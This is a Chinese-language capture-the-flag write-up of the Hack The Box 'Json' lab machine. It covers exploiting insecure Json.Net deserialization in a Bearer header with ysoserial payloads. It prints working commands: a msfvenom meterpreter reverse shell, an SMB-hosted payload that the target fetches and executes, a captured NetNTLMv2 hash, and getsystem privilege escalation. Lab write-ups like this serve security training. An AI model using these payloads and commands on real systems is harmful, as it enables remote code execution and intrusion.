title: Hack The Box - Json 不安全的反序列化 author: World'sEnd layout: true categories: 漏洞专题 tags:
•漏洞笔记
Hack The Box - json
目标IP为10.10.10.158
# Nmap 7.92 scan initiated Sat Apr 9 17:49:41 2022 as: nmap -sV -sC -Pn -T4 -p- -oA nmap.txt 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.40s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:ff (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-09T10:03:30
|_ start_date: 2022-04-09T09:49:04
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 9 18:03:40 2022 -- 1 IP address (1 host up) scanned in 839.40 seconds
21端口不允许匿名登录,也无相关漏洞:
searchsploit FileZilla ftpd
Exploits: No Results
Shellcodes: No Results
我访问了80端口,但是贼有意思,会在访问的那一刻进入一个正常页面:
但是紧接着会跳转到一个登录页面:
那我岂不是把进入页面发起的重定向请求拦截掉,就会产生未授权访问漏洞,可惜是,我试了下不知道何种原因它不行,但是理论上是可以的。应该是某种环境问题。
然而我不需要纠结是否可利用未授权漏洞了,因为admin/admin它就登录进去了,粗略一扫主页面没什么能够供我点击的地方,还做了个假按钮来骗我,右上方的生成报告根本不会产生任何请求,也不会跳转到任何地方,就是在原地TP。好吧,整个页面都是假的,甚至连搜索框都是假的,消息提示也是假的,整个页面除了左边的Charts与Tables会弹出404页面,其他都是假的。
或许Wappalyzer是真的:
IIS服务组件,windows server系统,ASP.NET环境。路径爆破一波:
[18:21:23] Starting:
[18:21:27] 403 - 312B - /%2e%2e//google.com
[18:21:27] 301 - 146B - /js -> http://10.10.10.158/js/
[18:21:39] 403 - 3KB - /Trace.axd
[18:21:40] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:22:05] 301 - 147B - /css -> http://10.10.10.158/css/
[18:22:11] 301 - 149B - /files -> http://10.10.10.158/files/
[18:22:11] 403 - 1KB - /files/
[18:22:15] 301 - 147B - /img -> http://10.10.10.158/img/
[18:22:15] 200 - 39KB - /index.html
[18:22:17] 400 - 4KB - /jolokia/exec/java.lang:type=Memory/gc
[18:22:17] 400 - 4KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[18:22:17] 400 - 4KB - /jolokia/search/*:j2eeType=J2EEServer,*
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[18:22:17] 400 - 4KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[18:22:17] 403 - 1KB - /js/
[18:22:17] 400 - 4KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[18:22:19] 200 - 4KB - /login.html
[18:22:47] 301 - 149B - /views -> http://10.10.10.158/views/
所有301页面都会这样:
但是看目标靶机标签是反序列化,那目前我能找到的反序列化点,只有在登录框了,因为它有个标志性的Remember me,它也为我返回了标志性的set cookie:
但它并不是shiro,它的cookie字段是这样的:
eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
base64解码后是这样:
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}
密码是以md5哈希形式存储传输的:
echo -n admin | md5sum
21232f297a57a5a743894a0e4a801fc3
紧接着我会抓到第二个包:
GET /api/Account/ HTTP/1.1
Host: 10.10.10.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
DNT: 1
Connection: close
Referer: http://10.10.10.158/index.html
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
其Bearer字段与cookie字段看起来是一样的啊,我尝试把cookie字段更改一下,服务器会返回我以下数据包:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2022 16:04:17 GMT
Connection: close
Content-Length: 119
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}
没什么用,不管如何更改都会回复以上数据包,但是Bearer字段就不一样,只要对其进行更改,服务端就会报错:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2022 16:04:58 GMT
Connection: close
Content-Length: 132
{"Message":"An error has occurred.","ExceptionMessage":"Invalid format base64","ExceptionType":"System.Exception","StackTrace":null}
这样看起来反序列化注入点在Bearer字段,接着我找到了如下工具包:
https://github.com/frohoff/ysoserial
虽然是exe,但是可以在windows使用生成对应payload再复制到kalinux中:
.\ysoserial.exe -f Json.Net -o base64 -c "ping 10.10.16.9" -g ObjectDataProvider
ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgMTAuMTAuMTYuOSddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9
解码后就是这样:
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c ping 10.10.16.9']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
我可以本地监听ICMP流量来验证漏洞利用是否成功:
tcpdump -i tun0 icmp and src 10.10.10.158
然后构造以下数据包发送给目标服务器,cookie字段在我测试时发现有它无它根本没什么关系:
GET /api/Account/ HTTP/1.1
Host: 10.10.10.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Bearer: ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgMTAuMTAuMTYuOSddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9
DNT: 1
Connection: close
Referer: http://10.10.10.158/index.html
Cookie: OAuth2=
tcpdump监听到了来自目标icmp协议的流量包:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:27:37.302600 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 5, length 40
10:27:38.225115 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 6, length 40
10:27:39.241911 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 7, length 40
10:27:40.256337 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 8, length 40
看来我利用成功了,确实是这么回事,那我可以将对应的ping命令替换为我希望执行的命令,我试着通过wget为目标传入一个载荷或是nc,但是只要加了-O参数就会石沉大海毫无回应出现未知错误。导致我也无法得知我将nc与载荷传入到了目标什么地方。所以我建立了一个smb文件共享,让其执行我共享文件中的载荷,首先本地Metasploit启动相应的监听器:
msf-pro exploit(multi/handler) > set LhOST 10.10.16.9
LhOST => 10.10.16.9
msf-pro exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf-pro exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf-pro exploit(multi/handler) > run
并生成对应载荷:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe > shell.exe
然后在生成的载荷目录启动smb文件共享:
impacket-smbserver share .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
再用Ysoserial生成载荷
.\ysoserial.exe -f Json.Net -o base64 -c "net use \\10.10.16.9\share & \\10.10.16.9\share\shell.exe" -g ObjectDataProvider
得到以下base64编码后的载荷:
ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIG5ldCB1c2UgXFxcXDEwLjEwLjE2LjlcXHNoYXJlICYgXFxcXDEwLjEwLjE2LjlcXHNoYXJlXFxzaGVsbC5leGUnXQ0KICAgIH0sDQogICAgJ09iamVjdEluc3RhbmNlJzp7JyR0eXBlJzonU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODknfQ0KfQ==
可以解码看一眼有无错误:
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c net use \\\\10.10.16.9\\share & \\\\10.10.16.9\\share\\shell.exe']
},
a
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
然后将其通过burpsuite发送,smb共享目录中如果出现以下信息则表示目标访问了我启动的smb共享:
[*] Incoming connection (10.10.10.158,49712)
[*] AUTHENTICATE_MESSAGE (JSON\userpool,JSON)
[*] User JSON\userpool authenticated successfully
[*] userpool::JSON:aaaaaaaaaaaaaaaa:1975aeb1e7ccda72722d6f7219a9ff7a:010100000000000080756f58944cd80148b2b38ce56d992300000000010010004a006400780074004f0044006a007200030010004a006400780074004f0044006a0072000200100076006b004b006d0047006900590058000400100076006b004b006d0047006900590058000700080080756f58944cd80106000400020000000800300030000000000000000000000000300000dfbb05e9e77b2854b41933c307abd332ab641a0af5e539c003d77a77ac01757d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
Metasploit中即可收到Meterpreter会话:
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175174 bytes) to 10.10.10.158
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.10.10.158:49713 ) at 2022-04-10 12:35:26 +0800
meterpreter >
windows提权机制很多很多,我之前也写过很多了,就不再写了。这里可以直接通过getsystem获取到system权限:
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
User.txt:
c:\Users\userpool\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is B219-32A3
Directory of c:\Users\userpool\Desktop
05/22/2019 05:07 PM <DIR> .
05/22/2019 05:07 PM <DIR> ..
05/22/2019 05:07 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 20,318,572,544 bytes free
c:\Users\userpool\Desktop>type user.txt
type user.txt
Root.txt:
c:\Users\superadmin>cd desktop
cd desktop
c:\Users\superadmin\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is B219-32A3
Directory of c:\Users\superadmin\Desktop
03/17/2021 07:59 AM <DIR> .
03/17/2021 07:59 AM <DIR> ..
05/22/2019 05:06 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 20,318,568,448 bytes free
c:\Users\superadmin\Desktop>type root.txt
type root.txt